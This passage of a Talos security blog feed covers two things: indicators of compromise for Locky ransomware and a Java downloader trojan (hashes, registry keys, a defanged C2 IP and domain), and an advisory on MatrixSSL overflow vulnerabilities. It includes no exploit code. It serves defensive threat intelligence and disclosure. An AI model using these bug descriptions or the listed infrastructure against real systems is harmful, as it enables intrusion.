/&gt;&lt;ul&gt;&lt;li&gt;be73fc08bed6bba6c25688c150da18e26314c5d670d741d52c457e01f0a1ad0e&lt;/li&gt;&lt;li&gt;f1055f9d223106263dd0d8879be304da2cbe83428c2277a8b42c96c762121a1b&lt;/li&gt;&lt;li&gt;a5024be1b974fc16ca190a26a01bef35e02aceaa4c8fe8a3938084e22d623ce2&lt;/li&gt;&lt;li&gt;eb319d0c53ec709a0482cf58a65b615fcba38a2b44b41e832b4804c6aba68280&lt;/li&gt;&lt;li&gt;75d9b6086aa9bd51596733a163bd568cc648978ac68e7ebdd817654b4c7e6fed&lt;/li&gt;&lt;li&gt;d323180a15cf584a184aa63a0044ec7701cb9d75769386bec21992ffd585d9dc&lt;/li&gt;&lt;li&gt;eeb4c5448c1a4a8723f860c7ce30889c2c5d018abe17df43fae2f6d23a713568&lt;/li&gt;&lt;li&gt;4657c3f05d44048fdfc41190e652413ba2508565aa9185fa1a0670a2536a95cc&lt;/li&gt;&lt;li&gt;c585135463d4fce5053f47c255747524585b98c1c3f8dc305beefa17d2fcfa9e&lt;/li&gt;&lt;li&gt;c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-Wjh0fUhcD78/WU1wzPQMOHI/AAAAAAAABII/UAcOOdz4TOALQA34jWqxLWJ00NyN3zTwQCLcBGAs/s1600/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://2.bp.blogspot.com/-Wjh0fUhcD78/WU1wzPQMOHI/AAAAAAAABII/UAcOOdz4TOALQA34jWqxLWJ00NyN3zTwQCLcBGAs/s320/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-VFvg3MIifjM/WU1w1zwqmOI/AAAAAAAABIM/ROrNUTHHJVY-uwOIrb9Nz4uEwwPJWGYEQCLcBGAs/s1600/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="975" data-original-width="1237" height="315" src="https://3.bp.blogspot.com/-VFvg3MIifjM/WU1w1zwqmOI/AAAAAAAABIM/ROrNUTHHJVY-uwOIrb9Nz4uEwwPJWGYEQCLcBGAs/s400/c99d37d2cfc2861254d1bb82cc6b41617e659e8f0430e63cd20f44778a3bfaac_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/--fAH3wGpXMc/WU1w5sgkH2I/AAAAAAAABIQ/q8EgasZaF2Yv0WFQKlgPwi-pW-nJ8QhUwCLcBGAs/s1600/pokas12.ddns.net_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="414" data-original-width="1112" height="148" src="https://1.bp.blogspot.com/--fAH3wGpXMc/WU1w5sgkH2I/AAAAAAAABIQ/q8EgasZaF2Yv0WFQKlgPwi-pW-nJ8QhUwCLcBGAs/s400/pokas12.ddns.net_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Locky-6330799-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;.*\loptr-5e5a.htm&lt;/li&gt;&lt;li&gt;&amp;lt;GUID&amp;gt;.loptr&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;091141f6b67540ba8848f1b081ad40d5f6d8172c878d40046f82ab0234acf3db&lt;/li&gt;&lt;li&gt;7f4777245025c96d936d14b3b4a718be35ced59558f090e1197adfca5d9573b2&lt;/li&gt;&lt;li&gt;26074772fa68db08f463c66deeabe064bcd9d48032430bbbdf27ffdf8967e8c5&lt;/li&gt;&lt;li&gt;85fa592bf685966d8da1cf72f2c6c092b40664de9c17d9cc4894f8f08e06f567&lt;/li&gt;&lt;li&gt;49184047c840287909cf0e6a5e00273c6d60da1750655ad66e219426b3cf9cd8&lt;/li&gt;&lt;li&gt;e7b8d8e3c19b6b3cc4a6eafced463f08176330fe243d8a9fcd20aedc5af17806&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-2HLUs8r-6l8/WU1xB7HvpgI/AAAAAAAABIU/j5ojA5N6nd4sy-CPdo1pcjF4RIJH5YwrwCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_amp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="245" data-original-width="359" height="272" src="https://4.bp.blogspot.com/-2HLUs8r-6l8/WU1xB7HvpgI/AAAAAAAABIU/j5ojA5N6nd4sy-CPdo1pcjF4RIJH5YwrwCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_amp.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-xdgtcCNR2QE/WU1xrVz7HHI/AAAAAAAABIw/VUw5UZWatIgkoGklrhVTn7KLodU8S_pXQCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_threatgrid.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="433" data-original-width="1233" height="140" src="https://2.bp.blogspot.com/-xdgtcCNR2QE/WU1xrVz7HHI/AAAAAAAABIw/VUw5UZWatIgkoGklrhVTn7KLodU8S_pXQCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_threatgrid.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-h9t6YsqcgQU/WU1xnyQ8OtI/AAAAAAAABIs/khql1v47zpEaA404VqCbK2pbEvVGGNBfQCLcBGAs/s1600/Win_Ransomware_Locky_6330799_0_malware.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="630" data-original-width="944" height="266" src="https://3.bp.blogspot.com/-h9t6YsqcgQU/WU1xnyQ8OtI/AAAAAAAABIs/khql1v47zpEaA404VqCbK2pbEvVGGNBfQCLcBGAs/s400/Win_Ransomware_Locky_6330799_0_malware.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.DownloaderJava-6330457-0&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;internat.exe&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: &lt;/b&gt;miZPeWpyLHr&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\My&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\Windows Script Host\Settings&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\Microsoft&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\System\CurrentControlSet\Services\Tcpip\Parameters&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SystemCertificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TrustedPeople&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\trust&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\DISALLOWED\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Microsoft\SystemCertificates\Disallowed&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Wow6432Node\Microsoft\EnterpriseCertificates\Disallowed&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\Software\Policies\Microsoft\SystemCertificates\CA&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUST\CRLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TrustedPublisher&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;A&amp;gt;\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\LruList&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\Control\DeviceClasses&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SYSTEM\CONTROLSET001\Control\CoDeviceInstallers&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\ENTERPRISECERTIFICATES\Root&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPEOPLE\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\Certificates&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\TRUSTEDPUBLISHER\CTLs&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\Software\Microsoft\SystemCertificates\TrustedPeople&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;A&amp;gt;\{C108F07B-312C-11E7-8D90-00501E3AE7B5}\DEFAULTOBJECTSTORE\OBJECTTABLE\A93\Indexes&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\WOW6432NODE\Policies&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKLM&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\PRINT\PRINTERS\Fax\PrinterDriverData&lt;/b&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\DISALLOWED\CRLs&lt;/b&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N11463_-4521624950585898-1497978066453&lt;/li&gt;&lt;li&gt;Local\__DDrawExclMode__&lt;/li&gt;&lt;li&gt;Local\__DDrawCheckExclMode__&lt;/li&gt;&lt;li&gt;RasPbFile&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;149[.]210[.]145[.]237&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;nup[.]pw&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\jfr.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\rt.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\jfr\default.jfc&lt;/li&gt;&lt;li&gt;%AppData%\1497978066454.jar&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\javafx.properties&lt;/li&gt;&lt;li&gt;%AppData%\.q7z.exe&lt;/li&gt;&lt;li&gt;%TEMP%\_0.15066600419658372851713423405977803.class&lt;/li&gt;&lt;li&gt;%WinDir%\Temp\FXSTIFFDebugLogFile.txt&lt;/li&gt;&lt;li&gt;\Users\Administrator\UlBrZNAMJSJ\iMCImxZnYcm.KwyVDG&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA3A6.8e4d0709-e282-42fd-a717-9d512ecd2cb0.7z&lt;/li&gt;&lt;li&gt;%TEMP%\_0.32579030377917368405753216876059627.class&lt;/li&gt;&lt;li&gt;\TEMP\c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791.exe&lt;/li&gt;&lt;li&gt;%TEMP%\Windows7851854962857713622.dll&lt;/li&gt;&lt;li&gt;\Users\Administrator\fUTkALeaTxM\ID.txt&lt;/li&gt;&lt;li&gt;%AppData%\Oracle\lib\fontconfig.properties.src&lt;/li&gt;&lt;li&gt;%AppData%\.qjava\Java\lib\ext\cldrdata.jar&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA3A6.tmp&lt;/li&gt;&lt;li&gt;\Users\Administrator\UlBrZNAMJSJ\ID.txt&lt;/li&gt;&lt;li&gt;%AppData%\Oracle\lib\jfr\profile.jfc&lt;/li&gt;&lt;li&gt;%TEMP%\tmpA395.tmp&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;c9bd2f466d2c1500af5414f03f7d5c908cafdd602c23a8136cf82054233f7791&lt;/li&gt;&lt;li&gt;a49fb3f2f4a8e5d996b49d51eae11ec11dca3a1aa2db319ed004d898c4484bf2&lt;/li&gt;&lt;li&gt;b0f8ca0c55a07bc4a9a12ee6dade6843aa9ca875ebd082759b2a85727fe64f83&lt;/li&gt;&lt;li&gt;26c487810b80460a69711463dc3ffaa8d0ca6cc21dbf2856660fc1ceed23af53&lt;/li&gt;&lt;li&gt;555bdc43352d19ed64b7580206208462bfd3be9038bcb92c0898d2861f995c4b&lt;/li&gt;&lt;li&gt;3977f37224326f7508ed5f086fc4161d2f8d2aacff62f7c05d29243a8f401fa8&lt;/li&gt;&lt;li&gt;a84eef3d331514764cb72146a376f61e3cf2189fa7d2f81d1a7e99b41fafaedf&lt;/li&gt;&lt;/ul&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://1.bp.blogspot.com/-8-ewx032dEo/WShN7e2cmKI/AAAAAAAABAg/1zHeN8V4h-sP6aW4ev8jafnU6MW4QEE0wCLcB/s1600/no-email-security.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-W4C4KZIfGgs/WU1xZAqdcEI/AAAAAAAABIg/EHVNfaaWioIXYkQSjwWWC84H0nYA2xqawCLcBGAs/s1600/Win_Trojan_DownloaderJava_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="420" data-original-width="618" height="271" src="https://1.bp.blogspot.com/-W4C4KZIfGgs/WU1xZAqdcEI/AAAAAAAABIg/EHVNfaaWioIXYkQSjwWWC84H0nYA2xqawCLcBGAs/s400/Win_Trojan_DownloaderJava_amp.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-0fzhey3GEKQ/WU1xcvojIcI/AAAAAAAABIk/CgLvDVvnlZQa_SfFsVPCP4OoJSOkhwPsACLcBGAs/s1600/Win_Trojan_DownloaderJava_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="611" data-original-width="1600" height="152" src="https://3.bp.blogspot.com/-0fzhey3GEKQ/WU1xcvojIcI/AAAAAAAABIk/CgLvDVvnlZQa_SfFsVPCP4OoJSOkhwPsACLcBGAs/s400/Win_Trojan_DownloaderJava_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-QTHMm9gpHY4/WU1xi_rVWaI/AAAAAAAABIo/xq00p_JUUYwl3g-LKu5jgt6PkEhyCtgCwCLcBGAs/s1600/Win_Trojan_DownloaderJava_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="774" data-original-width="1600" height="192" src="https://2.bp.blogspot.com/-QTHMm9gpHY4/WU1xi_rVWaI/AAAAAAAABIo/xq00p_JUUYwl3g-LKu5jgt6PkEhyCtgCwCLcBGAs/s400/Win_Trojan_DownloaderJava_umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=LGYCPT-CKkM:8SlKUsYwVA8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/LGYCPT-CKkM" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-23T15:55:17.426-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s72-c/no-netsec.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/threat-roundup-0616-0623.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Multiple Vulnerabilities in InsideSecure MatrixSSL</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/QAa9jYAi7gA/matrixssl-multiple-vulns.html</link><category>0-day</category><category>matrixssl</category><category>vulndev</category><category>vulnerabilities</category><author>noreply@blogger.com (Edmund Brumaghin)</author><pubDate>Thu, 22 Jun 2017 10:37:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-3086354566922561896</guid><description>&lt;i&gt;These vulnerabilities were discovered by Aleksandar Nikolic of Cisco Talos&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Overview&lt;/h2&gt;&lt;br /&gt;MatrixSSL is a TLS/SSL stack offered in the form of a Software Development Kit (SDK) that is geared towards application in Internet of Things (IOT) devices and other embedded systems. It features low resource overhead and supports many different embedded platforms. It also features FIPS 140-2 compliant cryptography making it suitable for use in high security environments. Talos recently discovered multiple vulnerabilities in MatrixSSL version 3.8.7b including two remote code execution (RCE) vulnerabilities as well as an information disclosure vulnerability.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0276: InsideSecure MatrixSSL x509 certificate SubjectDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2780)&lt;/h3&gt;&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the x509 SubjectDomainPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. This vulnerability could be exploited by an attacker to achieve remote code execution on vulnerable systems using a specially crafted OID value.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0277: InsideSecure MatrixSSL x509 certificate IssuerDomainPolicy Remote Code Execution Vulnerability (CVE-2017-2781)&lt;/h3&gt;&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;MatrixSSL is susceptible to a heap based buffer overflow due to a vulnerability in the 'parsePolicyMappings' function while parsing the IssuerPolicy PolicyMappings extension. When parsing x509 certificates in DER format, a fixed size heap allocation occurs. In situations where the received encoded OID value is longer than the amount of space that has been allocated to the heap, an overflow condition occurs. This vulnerability could be exploited by an attacker to achieve remote code execution using a specially crafted OID value.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;TALOS-2017-0278: InsideSecure MatrixSSL x509 certificate General Names Information Disclosure Vulnerability (CVE-2017-2782)&lt;/h3&gt;&lt;h3&gt;&amp;nbsp;&lt;/h3&gt;MatrixSSL is susceptible to an integer overflow due to a vulnerability in how general names extensions are parsed by the 'parseGeneralNames' function. An specially crafted x509 certificate containing attacker controlled subject alternative names ASN1 strings can be used to create an integer overflow that can be used to leak sensitive information on affected systems.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;&lt;h2&gt;&amp;nbsp;&lt;/h2&gt;Talos has worked to responsibly disclose these vulnerabilities to InsideSecure. InsideSecure has released a security update 3.9.3 to resolve these issues. Many of the embedded systems potentially affected by these vulnerabilities lack modern heap exploitation mitigations which may make it easier to successfully exploit them. As some of these vulnerabilities can be leveraged by an attacker to obtain remote code execution on affected systems, it is recommended that the security update be 